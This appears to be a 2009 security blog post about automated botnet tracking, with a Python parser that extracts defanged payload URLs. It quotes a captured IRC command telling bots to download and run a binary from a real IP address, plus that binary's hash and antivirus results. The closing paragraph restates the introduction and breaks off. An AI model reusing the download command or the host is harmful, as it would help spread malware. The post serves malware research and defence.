Botnet Update In Action
I am currently developing a tool to automate tracking botnets. Input is a folder of binaries, and output is endless bot logs (commands, conversations, how they work), plus (possibly unseen, undetected) malware binaries and hopefully automated analysis too. =)
Here is something my tool caught while I was testing it on a botnet. I used one of the malware binaries caught by my honeypot to infiltrate the botnet =) They are paying off!
2009-08-23 18:27:20,644 - log-6 - INFO - Received : [:irc.efnet.com 332 [ #xx6 :.flushdns |.down -S |.update -S |.update http://94[dot]76[dot]194[dot]116/xx8.exe x5s5g6q3x1n3.exe x5s5g6q3x1n3]
There is some German text in there… not necessarily theirs though. It disconnected me:
ERROR :Closing Link: [[<my ip, removed!!!>] (Client hat die Verbindung getrennt)
The binary is very new: it showed up just 4 hours ago, at 2009-08-23 18:27:20,644 (GMT+8).
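The interesting part of the capture above is the channel topic: the IRC server's 332 (RPL_TOPIC) reply carries a "|"-separated list of bot commands that every bot executes on join, and the ".update" entry names the URL of the new binary and the filename it is dropped as. Below is an added example (not part of the post or of the author's tool) of how a tracker can pull those indicators out of logs in the same "timestamp - logger - level - Received : [...]" format. The two log lines are constructed to mirror the capture (the nick, the second timestamp and the client IP are made up); the refang/defang helpers and the summary structure are my own choices, not anything the post describes.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Constructed sample lines modelled on the post's log format. The nick "xxbot",
# the second timestamp and the 203.0.113.7 client address are made up; the
# topic commands mirror the captured RPL_TOPIC.
SAMPLE_LOG = [
    "2009-08-23 18:27:20,644 - log-6 - INFO - Received : [:irc.efnet.com 332 xxbot #xx6 "
    ":.flushdns |.down -S |.update -S |.update http://94[dot]76[dot]194[dot]116/xx8.exe "
    "x5s5g6q3x1n3.exe x5s5g6q3x1n3]",
    "2009-08-23 18:27:21,102 - log-6 - INFO - Received : [ERROR :Closing Link: [203.0.113.7] "
    "(Client hat die Verbindung getrennt)]",
]

RECEIVED_RE = re.compile(r"Received : \[(?P<msg>.*)\]$")
# ":server 332 <nick> <channel> :<topic>"  (RPL_TOPIC)
TOPIC_RE = re.compile(r"^:(?P<server>\S+) 332 (?P<nick>\S+) (?P<chan>\S+) :(?P<topic>.*)$")
CLOSING_RE = re.compile(r"^ERROR :Closing Link: .*\((?P<reason>[^)]*)\)\s*$")
URL_RE = re.compile(r"^(?:hxxps?|https?)://", re.IGNORECASE)


@dataclass
class BotCommand:
    name: str        # command word without the leading '.'
    args: List[str]


@dataclass
class SessionSummary:
    channel: Optional[str] = None
    commands: List[BotCommand] = field(default_factory=list)
    # (defanged URL, host, filename the payload is dropped as)
    payloads: List[Tuple[str, str, str]] = field(default_factory=list)
    disconnect_reason: Optional[str] = None


def refang(url: str) -> str:
    """Undo common defanging so the URL can be parsed (only used locally, never fetched here)."""
    return url.replace("[dot]", ".").replace("[.]", ".").replace("hxxp", "http")


def defang(url: str) -> str:
    """Keep URLs unclickable in reports: scheme -> hxxp, dots in the host -> [dot]."""
    parts = urlsplit(refang(url))
    return f"hxxp://{parts.netloc.replace('.', '[dot]')}{parts.path}"


def parse_topic_commands(topic: str) -> List[BotCommand]:
    """The topic is a '|'-separated list of '.cmd arg ...' entries run by bots on join."""
    cmds = []
    for chunk in topic.split("|"):
        tokens = chunk.strip().split()
        if not tokens or not tokens[0].startswith("."):
            continue
        cmds.append(BotCommand(tokens[0][1:].lower(), tokens[1:]))
    return cmds


def payload_refs(cmds: List[BotCommand]) -> List[Tuple[str, str, str]]:
    """(defanged URL, host, drop filename) for each command carrying a URL (.update/.down)."""
    refs = []
    for cmd in cmds:
        for i, arg in enumerate(cmd.args):
            if URL_RE.match(arg):
                host = urlsplit(refang(arg)).hostname or ""
                drop_name = cmd.args[i + 1] if i + 1 < len(cmd.args) else ""
                refs.append((defang(arg), host, drop_name))
    return refs


def summarize(lines: List[str]) -> SessionSummary:
    """Walk the tracker log once and collect channel, commands, payload URLs and disconnect."""
    summary = SessionSummary()
    for line in lines:
        m = RECEIVED_RE.search(line)
        if not m:
            continue
        msg = m.group("msg")
        topic = TOPIC_RE.match(msg)
        if topic:
            summary.channel = topic.group("chan")
            cmds = parse_topic_commands(topic.group("topic"))
            summary.commands.extend(cmds)
            summary.payloads.extend(payload_refs(cmds))
            continue
        closing = CLOSING_RE.match(msg)
        if closing:
            summary.disconnect_reason = closing.group("reason")
    return summary


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    print("channel:", s.channel)
    for c in s.commands:
        print("command:", c.name, c.args)
    for url, host, drop in s.payloads:
        print("payload:", url, "host:", host, "dropped as:", drop)
    print("disconnect:", s.disconnect_reason)
```

The payload tuples are what you would feed back into the pipeline: the host goes on the C2/drop-site list, the URL is fetched (from a sandboxed collector, not the analysis box) and hashed so that a re-issued ".update" with a new MD5 is caught as a new sample.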
The binary at http://94[dot]76[dot]194[dot]116/xx8.exe (MD5: 7904937c07c031e81023dbd81ac93b64) has the following VirusTotal results:
File winhost.exe received on 2009.08.22 15:54:06 (UTC)
Current status: finished
Result: 6/41 (14.63%)

Antivirus          Version          Last Update  Result
a-squared          4.5.0.24         2009.08.22   -
AhnLab-V3          5.0.0.2          2009.08.21   -
AntiVir            7.9.1.3          2009.08.21   -
Antiy-AVL          2.0.3.7          2009.08.21   -
Authentium         5.1.2.4          2009.08.22   -
Avast              4.8.1335.0       2009.08.21   -
AVG                8.5.0.406        2009.08.22   Worm/Generic.AHOV
BitDefender        7.2              2009.08.22   -
CAT-QuickHeal      10.00            2009.08.22   -
ClamAV             0.94.1           2009.08.22   -
Comodo             2058             2009.08.22   -
DrWeb              5.0.0.12182      2009.08.22   BackDoor.IRC.Bot.127
eSafe              7.0.17.0         2009.08.20   -
eTrust-Vet         31.6.6694        2009.08.21   -
F-Prot             4.4.4.56         2009.08.22   -
F-Secure           8.0.14470.0      2009.08.21   -
Fortinet           3.120.0.0        2009.08.22   PossibleThreat
GData              19               2009.08.22   -
Ikarus             T3.1.1.68.0      2009.08.22   -
Jiangmin           11.0.800         2009.08.21   -
K7AntiVirus        7.10.825         2009.08.22   -
Kaspersky          7.0.0.125        2009.08.22   Net-Worm.Win32.Kolab.dpo
McAfee             5716             2009.08.21   -
McAfee+Artemis     5716             2009.08.21   Artemis!7904937C07C0
McAfee-GW-Edition  6.8.5            2009.08.22   -
Microsoft          1.4903           2009.08.22   -
NOD32              4358             2009.08.22   -
Norman             6.01.09          2009.08.21   -
nProtect           2009.1.8.0       2009.08.22   -
Panda              10.0.0.14        2009.08.22   -
PCTools            4.4.2.0          2009.08.22   -
Prevx              3.0              2009.08.22   Low Risk Adware
Rising             21.43.50.00      2009.08.22   -
Sophos             4.44.0           2009.08.22   -
Sunbelt            3.2.1858.2       2009.08.22   -
Symantec           1.4.4.12         2009.08.22   -
TheHacker          6.3.4.3.385      2009.08.22   -
TrendMicro         8.950.0.1094     2009.08.22   -
VBA32              3.12.10.9        2009.08.22   -
ViRobot            2009.8.22.1897   2009.08.22   -
VirusBuster        4.6.5.0          2009.08.21   -
Detection rate 14.63%! Only 6/41 scanners detected it. Apart from Kaspersky (Net-Worm.Win32.Kolab.dpo), AVG (Worm/Generic.AHOV) and DrWeb (BackDoor.IRC.Bot.127), the other three (Fortinet's PossibleThreat, McAfee's Artemis heuristic and Prevx's Low Risk Adware) are uncertain, generic verdicts.
Which scanner are you using?
I am writing an automated tool to track botnets. Given a pile of EXEs, it automatically produces a pile of live botnet feeds (commands, conversations, how they work), (possibly undiscovered and undetectable) malware files and (hopefully, in future) automated analysis.
Here is what my tool caught from a botnet during testing: